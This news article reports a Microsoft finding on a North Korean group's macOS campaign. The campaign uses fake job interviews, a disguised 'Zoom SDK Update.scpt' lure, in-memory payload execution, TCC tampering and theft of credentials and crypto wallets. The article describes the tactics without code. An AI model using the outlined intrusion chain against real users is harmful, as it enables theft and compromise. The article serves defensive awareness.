North Korean Cyber Threat Group Shifts Tactics in Sophisticated macOS Attack
A recent report has unveiled a sophisticated cyber campaign targeting macOS users, orchestrated by the North Korean threat actor known as Sapphire Sleet. This operation marks a significant shift from traditional software exploitation techniques towards social engineering methods to manipulate users into executing malicious files.
Rather than seeking out vulnerabilities in macOS, Sapphire Sleet’s campaign relies on psychological manipulation. Victims are deceived into executing files that are disguised as legitimate software updates, which effectively allows the attackers to bypass Apple’s built-in security mechanisms. This represents an alarming evolution in tactics for cybersecurity professionals and macOS users alike.
At the center of this malicious campaign is a fraudulent file named “Zoom SDK Update.scpt.” This seemingly innocuous file is presented as part of a routine software update, luring users into downloading and opening it. The recruitment strategy employed by the attackers is particularly concerning; victims are approached through fake profiles on professional networking sites, where they undergo a staged interview process that leads them to unwittingly download the malicious file.
Once the file is opened, it launches in Apple’s trusted Script Editor, giving the appearance of legitimacy by invoking benign system processes. This strategy reinforces the deceptive nature of the attack, making it challenging for average users to identify the threat. The script is meticulously crafted to mask its malicious intent. Initial decoy content provides fake update instructions, and thousands of blank lines conceal the actual harmful code from immediate detection.
Microsoft Threat Intelligence has verified the existence of this macOS-centric cyber campaign, detailing the steps taken by Sapphire Sleet to exploit the unsuspecting. After execution, the malicious script uses harmless system processes to present a façade of legitimacy. In the background, it covertly downloads additional payloads using command-line tools such as Curl. The downloaded malicious software then executes in memory via osascript, ensuring that no files are written to disk, thereby evading detection by traditional antivirus systems.
This multi-layered infection strategy enables Sapphire Sleet to establish persistent access to compromised systems, conduct thorough reconnaissance, and deploy multiple backdoors for future exploitation. One component of this malware, disguised as a system process named com.apple.cli, continuously collects system information and communicates with infrastructure controlled by the attackers.
In addition, the malware programmatically alters Apple’s Transparency, Consent, and Control (TCC) database, allowing unauthorized AppleScript operations to engage with sensitive system components without raising alarm bells among users. This manipulation opens doors for broader exploitations, as the attackers could access various sensitive information without triggering any user prompts that would typically alert users to unauthorized actions.
With enhanced permissions, the malware initiates extensive data collection routines aimed at acquiring browser data, cryptocurrency wallet information, SSH keys, Telegram sessions, Apple Notes, and system logs. Credential theft is a significant aspect of the campaign, with a malicious app named “systemupdate.app” designed to present victims with a counterfeit macOS password prompt that closely resembles legitimate system dialogs.
This targeted approach is particularly dangerous, especially for individuals and organizations in the finance and cryptocurrency sectors, as the attackers aim specifically at wallet extensions and key materials. Such tactics underscore a critical reality for macOS users: even fully updated systems can be at risk if users are tricked into executing malicious actions.
The dual approach of credential harvesting and data exfiltration allows Sapphire Sleet to gain direct access to digital assets and sensitive accounts. Following the discovery of the campaign, Microsoft promptly shared its findings with Apple, which responded by deploying XProtect signatures and Safe Browsing updates aimed at detecting and blocking associated malware and infrastructure.
These protective measures are a step in the right direction; however, the campaign highlights an unsettling trend where attackers increasingly rely on manipulating user trust rather than capitalizing on software vulnerabilities. As threat actors refine their social engineering tactics and misuse trusted applications, the burden of security increasingly falls on user awareness, stringent execution controls, and multi-layered defense strategies rather than relying solely on platform protections.
In summary, the sophisticated nature of the Sapphire Sleet campaign serves as a stark reminder of the evolving landscape of cyber threats, where social engineering and user deception are becoming the preferred methods for exploitation. It calls for heightened vigilance among users and organizations alike to stay ahead of potential intrusions and protect sensitive information effectively.